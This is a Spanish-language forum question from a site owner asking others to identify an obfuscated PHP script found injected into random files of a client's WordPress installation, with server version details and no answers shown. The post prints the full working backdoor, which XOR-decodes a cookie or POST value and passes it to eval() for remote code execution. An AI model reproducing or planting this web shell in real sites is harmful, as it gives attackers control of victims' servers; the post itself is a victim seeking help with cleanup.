Script aleatorio inyectado en wordpress proyecto [duplicado]

1

Recientemente, un sitio web en wordpress que se encuentra en el servidor de mi cliente aparece con el siguiente script de forma aleatoria. Alguien conoce este patrón de virus / malware / exploit o algo así?

<?php $GLOBALS['c851bc'] = "\x54\x50\x56\x6a\x77\x3a\x5e\x6e\x2c\x43\x2f\x3c\x61\x59\x25\x28\x4e\x5b\x38\x5f\x53\x6b\x41\x2a\x5d\x62\x4d\x75\x51\x68\x60\x5c\x31\x30\x44\x7a\x21\x78\x29\x5a\x3d\x47\x42\x36\x2e\x49\x34\x6d\x79\x69\x7b\x4f\x76\x7d\x20\x32\x57\x46\x2d\xd\x73\x4c\x74\x33\x27\x23\x39\x7e\x58\x35\x26\x3e\x55\x45\x67\x72\xa\x2b\x52\x24\x71\x37\x70\x40\x64\x63\x3f\x4b\x22\x66\x65\x7c\x3b\x4a\x6f\x48\x9\x6c";

$GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][43]] = $GLOBALS['c851bc'][85].$GLOBALS['c851bc'][29].$GLOBALS['c851bc'][75];
$GLOBALS[$GLOBALS['c851bc'][4].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][63]] = $GLOBALS['c851bc'][94].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][84];
$GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][66]] = $GLOBALS['c851bc'][60].$GLOBALS['c851bc'][62].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][97].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][7];
$GLOBALS[$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][25]] = $GLOBALS['c851bc'][49].$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][60].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][62];
$GLOBALS[$GLOBALS['c851bc'][27].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][46]] = $GLOBALS['c851bc'][60].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][97].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][35].$GLOBALS['c851bc'][90];
$GLOBALS[$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][84]] = $GLOBALS['c851bc'][82].$GLOBALS['c851bc'][29].$GLOBALS['c851bc'][82].$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][60].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][7];
$GLOBALS[$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][12]] = $GLOBALS['c851bc'][27].$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][60].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][97].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][35].$GLOBALS['c851bc'][90];
$GLOBALS[$GLOBALS['c851bc'][74].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][85]] = $GLOBALS['c851bc'][25].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][60].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90];
$GLOBALS[$GLOBALS['c851bc'][80].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][84]] = $GLOBALS['c851bc'][60].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][62].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][62].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][47].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][97].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][47].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][62];
$GLOBALS[$GLOBALS['c851bc'][29].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][32]] = $GLOBALS['c851bc'][29].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][46];
$GLOBALS[$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63]] = $GLOBALS['c851bc'][3].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][85];
$GLOBALS[$GLOBALS['c851bc'][21].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][32]] = $_POST;
$GLOBALS[$GLOBALS['c851bc'][3].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][25]] = $_COOKIE;
@$GLOBALS[$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][25]]($GLOBALS['c851bc'][90].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][97].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][74], NULL);
@$GLOBALS[$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][25]]($GLOBALS['c851bc'][97].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][74].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][60], 0);
@$GLOBALS[$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][25]]($GLOBALS['c851bc'][47].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][37].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][37].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][27].$GLOBALS['c851bc'][62].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][62].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][47].$GLOBALS['c851bc'][90], 0);
@$GLOBALS[$GLOBALS['c851bc'][80].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][84]](0);

$y8b51 = NULL;
$l5bcd7 = NULL;

$GLOBALS[$GLOBALS['c851bc'][29].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][25]] = $GLOBALS['c851bc'][55].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][32].$GLOBALS['c851bc'][58].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][32].$GLOBALS['c851bc'][32].$GLOBALS['c851bc'][58].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][58].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][58].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][85];
global $h6393db;

function jb0ac($y8b51, $g0c13e)
{
    $j25b84da = "";

    for ($e143=0; $e143<$GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][66]]($y8b51);)
    {
        for ($l6c2=0; $l6c2<$GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][66]]($g0c13e) && $e143<$GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][66]]($y8b51); $l6c2++, $e143++)
        {
            $j25b84da .= $GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][43]]($GLOBALS[$GLOBALS['c851bc'][4].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][63]]($y8b51[$e143]) ^ $GLOBALS[$GLOBALS['c851bc'][4].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][63]]($g0c13e[$l6c2]));
        }
    }

    return $j25b84da;
}

function h624($y8b51, $g0c13e)
{
    global $h6393db;

    return $GLOBALS[$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63]]($GLOBALS[$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63]]($y8b51, $h6393db), $g0c13e);
}

foreach ($GLOBALS[$GLOBALS['c851bc'][3].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][25]] as $g0c13e=>$k0c0)
{
    $y8b51 = $k0c0;
    $l5bcd7 = $g0c13e;
}

if (!$y8b51)
{
    foreach ($GLOBALS[$GLOBALS['c851bc'][21].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][32]] as $g0c13e=>$k0c0)
    {
        $y8b51 = $k0c0;
        $l5bcd7 = $g0c13e;
    }
}

$y8b51 = @$GLOBALS[$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][12]]($GLOBALS[$GLOBALS['c851bc'][29].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][32]]($GLOBALS[$GLOBALS['c851bc'][74].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][85]]($y8b51), $l5bcd7));
if (isset($y8b51[$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][21]]) && $h6393db==$y8b51[$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][21]])
{
    if ($y8b51[$GLOBALS['c851bc'][12]] == $GLOBALS['c851bc'][49])
    {
        $e143 = Array(
            $GLOBALS['c851bc'][82].$GLOBALS['c851bc'][52] => @$GLOBALS[$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][84]](),
            $GLOBALS['c851bc'][60].$GLOBALS['c851bc'][52] => $GLOBALS['c851bc'][32].$GLOBALS['c851bc'][44].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][58].$GLOBALS['c851bc'][32],
        );
        echo @$GLOBALS[$GLOBALS['c851bc'][27].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][46]]($e143);
    }
    elseif ($y8b51[$GLOBALS['c851bc'][12]] == $GLOBALS['c851bc'][90])
    {
        eval($y8b51[$GLOBALS['c851bc'][84]]);
    }
    exit();

Informaciones:

uname -a
Linux 2.6.32-504.8.1.el6.x86_64 #1 SMP Wed Jan 28 21:11:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

PHP 5.4.37
WordPress en la última versión estable

Aparentemente es inyección de guiones. Pero en archivos aleatorios y siempre en diferentes carpetas. No hay ningún patrón en el nombre de las cadenas. Todas las inyecciones son con diferentes cadenas de nombres.

    
pregunta Rafael Soufraz 23.10.2015 - 22:24
fuente

0 respuestas

Lea otras preguntas en las etiquetas